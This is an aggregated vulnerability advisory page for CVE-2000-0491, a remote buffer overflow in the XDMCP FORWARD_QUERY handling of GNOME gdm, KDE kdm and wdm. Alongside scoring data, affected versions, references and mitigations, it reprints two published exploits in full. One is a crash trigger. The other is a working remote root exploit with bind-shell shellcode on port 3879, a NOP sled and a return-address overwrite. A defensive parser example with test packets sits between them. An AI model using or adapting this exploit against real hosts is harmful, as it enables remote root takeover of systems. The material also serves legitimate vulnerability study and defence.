CVE-2000-0491
CVSS 10.0
Published: 2000-05-24 00:00:00
Revised: 2008-09-10 15:04:48

[Original] Buffer overflow in the XDMCP parsing code of GNOME gdm, KDE kdm, and wdm allows remote attackers to execute arbitrary commands or cause a denial of service via a long FORWARD_QUERY request.


[CNNVD] GNOME gdm XDMCP Buffer Overflow Vulnerability (CNNVD-200005-086)

A buffer overflow exists in the XDMCP parsing code of GNOME gdm, KDE kdm and wdm. A remote attacker can execute arbitrary commands or cause a denial of service via an overlong FORWARD_QUERY request.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may lead to complete system shutdown]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/o:suse:suse_linux:6.2  SuSE SuSE Linux 6.2
cpe:/o:caldera:openlinux
cpe:/a:gnome:gdm:1.0
cpe:/o:suse:suse_linux:6.4  SuSE SuSE Linux 6.4

- OVAL (technical details for detection)

No related OVAL definitions found.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0491
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0491
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-086
(Official data source) CNNVD

- Other links and resources

ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-2000-013.0.txt
(VENDOR_ADVISORY)  CALDERA  CSSA-2000-013.0
http://www.securityfocus.com/bid/1370
(UNKNOWN)  BID  1370
http://www.securityfocus.com/bid/1279
(UNKNOWN)  BID  1279
http://www.securityfocus.com/bid/1233
(UNKNOWN)  BID  1233
http://www.novell.com/linux/security/advisories/suse_security_announce_49.html
(UNKNOWN)  SUSE  20000524 Security hole in gdm <= 2.0beta4-25
http://archives.neohapsis.com/archives/bugtraq/2000-06/0025.html
(UNKNOWN)  BUGTRAQ  20000607 Conectiva Linux Security Announcement - gdm
http://archives.neohapsis.com/archives/bugtraq/2000-05/0241.html
(UNKNOWN)  BUGTRAQ  20000521 "gdm" remote hole

- Vulnerability information

GNOME gdm XDMCP Buffer Overflow Vulnerability
Critical  Buffer overflow
2000-05-24 00:00:00 2005-10-20 00:00:00
Remote
A buffer overflow exists in the XDMCP parsing code of GNOME gdm, KDE kdm and wdm. A remote attacker can execute arbitrary commands or cause a denial of service via an overlong FORWARD_QUERY request.

- Advisories and patches

        Changing the contents of the 'Enable' variable to 0 in the gdm configuration file (often /etc/X11/gdm/gdm.conf) will eliminate this vulnerability.
        Update available:

- Vulnerability information (19947)

gdm 1.0 .x/2.0 .x BETA/2.2 .0 XDMCP Buffer Overflow Vulnerability (1) (EDBID:19947)
linux remote
2000-05-22 Verified
0 Chris Evans
N/A
source: http://www.securityfocus.com/bid/1233/info

A buffer overrun exists in the XDMCP handling code used in 'gdm', an xdm replacement, shipped as part of the GNOME desktop. By sending a maliciously crafted XDMCP message, it is possible for a remote attacker to execute arbitrary commands as root on the susceptible machine. The problem lies in the handling of the display information sent as part of an XDMCP 'FORWARD_QUERY' request.

By default, gdm is not configured to listen via XDMCP. The versions of gdm shipped with RedHat 6.0-6.2, Helix GNOME and gdm built from source are not vulnerable unless they were configured to accept XDMCP requests. This is configured via the /etc/X11/gdm/gdm.conf on some systems, although this file may vary. If the "Enable" variable is set to 0, you are not susceptible. 

/*    
 * breakgdm.c - Chris Evans
 */
   
#include <unistd.h>
#include <string.h>
#include <netinet/in.h>

int
main(int argc, const char* argv[])
{
  char deathbuf[1000];
  unsigned short s;   
  unsigned char c;    
  
  memset(deathbuf, 'A', sizeof(deathbuf));
  
  /* Write the Xdmcp header */
  /* Version */
  s = htons(1);
  write(1, &s, 2);
  /* Opcode: FORWARD_QUERY */
  s = htons(4);
  write(1, &s, 2);
  /* Length */    
  s = htons(1 + 2 + 1000 + 2);
  write(1, &s, 2);
  
  /* Now we're into FORWARD_QUERY which consists of
   * remote display, remote port, auth info. Remote display is binary
   * IP address data....
   */
  /* Remote display: 1000 A's which incidentally smoke a path
   * right to the stack
   */
  s = htons(sizeof(deathbuf));
  write(1, &s, 2);
  write(1, deathbuf, sizeof(deathbuf));
  /* Display port.. empty data will do */
  s = htons(0);
  write(1, &s, 2);
  /* Auth list.. empty data will do */
  c = 0;
  write(1, &c, 1);
  return 0;
}
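
The FORWARD_QUERY layout that breakgdm.c writes (version, opcode, length, then the display address as a 2-byte length plus data, the port, and the auth list), parsed defensively as an added example that is neither gdm's code nor part of the original post; the reason codes, the 16-byte address cap and the two constructed sample packets are this example's own choices.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define XDMCP_VERSION        1
#define XDMCP_FORWARD_QUERY  4
#define MAX_DISPLAY_ADDR    16  /* IPv4 is 4 bytes, IPv6 is 16; longer is not an address */
struct fwd_query { uint8_t addr[MAX_DISPLAY_ADDR]; uint16_t addr_len, port_len; uint8_t auth_count; };
static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Returns 0 on success or a negative reason code. Every length read from the datagram is
 * checked against the bytes actually present, and the display address is capped. */
int parse_forward_query(const uint8_t *pkt, size_t len, struct fwd_query *out)
{
    const uint8_t *p = pkt, *end = pkt + len;
    if (len < 6)                              return -1;  /* header truncated */
    if (rd16(p) != XDMCP_VERSION)             return -2;
    if (rd16(p + 2) != XDMCP_FORWARD_QUERY)   return -3;
    if ((size_t)rd16(p + 4) != len - 6)       return -4;  /* declared length != datagram size */
    p += 6;
    if (end - p < 2)                          return -5;
    uint16_t alen = rd16(p); p += 2;
    if (alen > MAX_DISPLAY_ADDR)              return -6;  /* oversized display address: the CVE-2000-0491 trigger */
    if ((size_t)(end - p) < alen)             return -7;  /* address runs past the datagram */
    memcpy(out->addr, p, alen); out->addr_len = alen; p += alen;
    if (end - p < 2)                          return -8;
    out->port_len = rd16(p); p += 2;
    if ((size_t)(end - p) < out->port_len)    return -9;  /* port field runs past the datagram */
    p += out->port_len;
    if (end - p < 1)                          return -10;
    out->auth_count = *p;
    return 0;
}

/* Constructed sample: a well-formed query with a 4-byte IPv4 display address (expect 0). */
int sample_ipv4_query(void)
{
    const uint8_t pkt[] = { 0,1, 0,4, 0,9,  0,4, 192,0,2,10,  0,0,  0 };
    struct fwd_query q = {0};
    return parse_forward_query(pkt, sizeof pkt, &q);
}

/* Constructed sample: the breakgdm.c layout, a 1000-byte display address (expect -6). */
int sample_overlong_query(void)
{
    static uint8_t pkt[6 + 2 + 1000 + 2 + 1];
    memset(pkt, 'A', sizeof pkt);
    pkt[0] = 0; pkt[1] = 1; pkt[2] = 0; pkt[3] = 4;  pkt[4] = 0x03; pkt[5] = 0xED;  /* version 1, FORWARD_QUERY, body length 1005 */
    pkt[6] = 0x03; pkt[7] = 0xE8;  pkt[1008] = pkt[1009] = pkt[1010] = 0;         /* address length 1000; empty port and auth list */
    struct fwd_query q = {0};
    return parse_forward_query(pkt, sizeof pkt, &q);
}
```

A display manager or an IDS rule that applies the same cap rejects the oversized packet before any copy into a fixed-size buffer happens.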

- Vulnerability information (19948)

gdm 1.0 .x/2.0 .x BETA/2.2 .0 XDMCP Buffer Overflow Vulnerability (2) (EDBID:19948)
linux remote
2000-05-22 Verified
0 AbraxaS
N/A
source: http://www.securityfocus.com/bid/1233/info

/*
 *             gdm (xdmcp) exploit
 *         written 05/2000 by AbraxaS
 *
 *     abraxas@sekure.de && www.sekure.de
 *
 *
 * Tested on:  SuSE 6.2 / gdm-2.0beta1-4,
 *           RedHat 6.2 / gdm-2.0beta2
 *
 * Offsets: Worked with offsets between 0 and 300
 *
 * Usage: gdmexpl [target] [offset]
 *
 * Note: Just a proof of concept.
 *
 * Greetings to: dies, grue, lamagra & (silly) peak
 */


#include <stdio.h>
#include <stdlib.h>       /* exit, atoi */
#include <string.h>       /* memcpy, memset, strlen */
#include <strings.h>      /* bzero */
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>    /* inet_addr */
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>

#define NOP 0x90

/* lammys bind shell code / binds a shell to port 3879 */
char code[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";


int resolve (char *denise)
{
  struct hostent *info;
  unsigned long ip;

  if ((ip=inet_addr(denise))==-1)
  {
    if ((info=gethostbyname(denise))==0)
    {
      printf("Couldn't resolve [%s]\n", denise);
      exit(0);
    }
    memcpy(&ip, (info->h_addr), 4);
  }
  return (ip);
}


int main (int argc, char **argv)
{
  char uhm;
  int nadine;
  short blah[6];
  char buffy[1400]; /* you might make this buffer bigger to increase the
                       probability to hit the right addy. making the
                       buffer too big could destroy the code though */
  unsigned long addy;
  struct sockaddr_in stephanie;
  char big_buffy[sizeof(buffy)+12];

  if (argc < 3)
  {
    printf("\nGDM 2.0betaX exploit by AbraxaS (abraxas@sekure.de)"
           "\nUsage: %s [target] [offset]\n", argv[0]);
    exit(0);
  }

  addy = 0xbffff8c0-atoi(argv[2]);

  stephanie.sin_family = AF_INET;
  stephanie.sin_port = htons (177);
  stephanie.sin_addr.s_addr = resolve(argv[1]);
  nadine = socket (AF_INET, SOCK_DGRAM, 0);

  if (connect(nadine, (struct sockaddr *)&stephanie, sizeof(struct sockaddr)) < 0)
  {
    perror("Connect"); exit(0);
  }

  /* filling buffer.buffy with NOPs */
  memset(buffy, NOP, sizeof(buffy));
  /* cleaning buffer.big_buffy */
  bzero(big_buffy, sizeof(big_buffy));

  /*
   *   creating XDMCP header
   */

  /* XDM_PROTOCOL_VERSION */
  blah[0] = htons(1);
  /* opcode "FORWARD_QUERY" */
  blah[1] = htons(4);
  /* length (checksum)*/
  blah[2] = htons(5+sizeof(buffy)); /* see checksum algorithm */
  /* length of display buffer */
  blah[3] = htons(sizeof(buffy));
  /* display port */
  blah[4] = htons(0);
  /* authlist */
  blah[5] = htons(0);

  *(short *)&big_buffy[0]=blah[0];
  *(short *)&big_buffy[2]=blah[1];
  *(short *)&big_buffy[4]=blah[2];
  *(short *)&big_buffy[6]=blah[3];
  *(short *)&big_buffy[sizeof(buffy)+8]=blah[4];
  *(short *)&big_buffy[sizeof(buffy)+10]=blah[5];


  /* writing shellcode */
  memcpy(buffy+sizeof(buffy)-strlen(code), code, strlen(code));

  /* fixing some stuff */
  *(long *)&buffy[0] = 0x0100007f; /* source address, not neccessary */
  *(long *)&buffy[4] = 0x00000000; /* cleaning clnt_authlist */
  *(long *)&buffy[8] = 0x00000000;

  /* writing own RET address */
  *(long *)&buffy[32]=addy;

  /* copying buffy into big_buffy */
  memcpy(big_buffy+8, buffy, sizeof(buffy));

  /* sending big_buffy */
  write(nadine, big_buffy, sizeof(big_buffy));

  printf("\nConnect to %s, port 3879 now.", argv[1]);
  printf("\nBut behave :) --abraxas\n");

  close(nadine);

  return 0;
}

- Vulnerability information

11754
GNOME Display Manager (gdm) XDMCP FORWARD_QUERY Request Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2000-05-21 Unknown
Unknown Unknown

- Solution

Multiple Linux vendors have released upgraded versions of the package which address this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

XFree86 xdm Buffer Overflow Vulnerability
Boundary Condition Error 1370
Yes No
2000-06-19 12:00:00 2009-07-11 02:56:00
This vulnerability was posted to the Bugtraq mailing list on June 19, 2000 by Chris Evans <chris@ferret.lmh.ox.ac.uk>

- Affected program versions

XFree86 X11R6 4.0.3
+ RedHat Linux 7.1
XFree86 X11R6 4.0.1
+ RedHat Linux 7.0
XFree86 X11R6 4.0
XFree86 X11R6 3.3.6
+ Debian Linux 2.2
+ Red Hat Linux 6.2
XFree86 X11R6 3.3.5
- RedHat Linux 6.1 i386
XFree86 X11R6 3.3.4
XFree86 X11R6 3.3.3
Wings wdm 1.2
KDE KDE 2.0 BETA
KDE KDE 1.2
- S.u.S.E. Linux 6.4
KDE KDE 1.1.2
+ Caldera OpenLinux 2.3
+ Mandriva Linux Mandrake 7.0
KDE KDE 1.1.1
KDE KDE 1.1

- Vulnerability discussion

Xdm is the X11 display manager, used for managing X11 user sessions. The XFree86 implementation of xdm (and derivatives such as kdm) contains a possibly exploitable buffer overflow condition.

The overflow is believed to exist when a remote Xserver is attempting to begin an xdm session via XDMCP. Successful exploitation of this vulnerability may provide an attacker with root access on the target host.

Though unconfirmed, it is most likely required that the attacking host be authorized to connect and listed in the Xaccess file.

- Exploit

Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Solution

Disabling XDMCP listening may eliminate this vulnerability.

Debian has released fixed packages.

Red Hat has released upgraded packages which correct this vulnerability.

Currently the SecurityFocus staff are not aware of any other vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.


XFree86 X11R6 3.3.6

XFree86 X11R6 4.0.1

XFree86 X11R6 4.0.3

- References
